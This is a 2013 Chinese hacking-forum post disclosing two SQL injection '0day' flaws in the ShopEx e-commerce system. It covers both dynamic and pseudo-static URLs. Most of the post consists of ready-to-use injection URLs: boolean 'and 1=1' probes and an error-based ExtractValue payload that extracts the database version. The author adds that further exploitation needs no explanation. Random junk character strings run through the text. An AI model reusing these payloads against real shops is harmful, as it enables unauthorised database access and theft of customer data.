找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1936|回复: 0
打印 上一主题 下一主题

shopex通杀注入0day漏洞两处

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-19 08:31:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… + `7 U: I' f1 Z, S& E% @% h# N/ }3 a

7 H' T( O/ M, K7 a* b2 E& ]好吧,我扯远了~~
# P0 `" `% @5 ]1 g- i+ o其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~) q" m: G( \+ |" I
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: $ y) e& [; z' s/ F2 r3 C
9 q! N# W, T# y8 D8 c1 @4 V: g
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html 3 Q; ?& q3 [5 W1 T" D

$ ^" T$ n" j4 v9 ~/ Q, jhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
6 v4 g' p; ]6 g: W& E  F6 ^. L. ?0 C7 z) r8 e" w9 J7 U
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html " g. F! K. n8 ^$ [" B

  e* S& R- R7 A% r0 C8 qhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
7 W$ u/ N' G# u/ n0 _$ k, n3 t: t' l& k: _
& h+ |: {3 K+ y9 Y" {7 r
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
6 L' i9 c( p7 a: ~5 Q如何注入就不多说了,10多年的东西了…不会也会了… : b" @: m$ l4 V
  I8 a0 {/ O4 ^  v8 z% W; k
, p9 B( X; E2 U5 y6 p
/ [0 e6 f$ @1 {

0 Z0 X( @% ^% j3 q$ Q0 N; D$ i. T
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表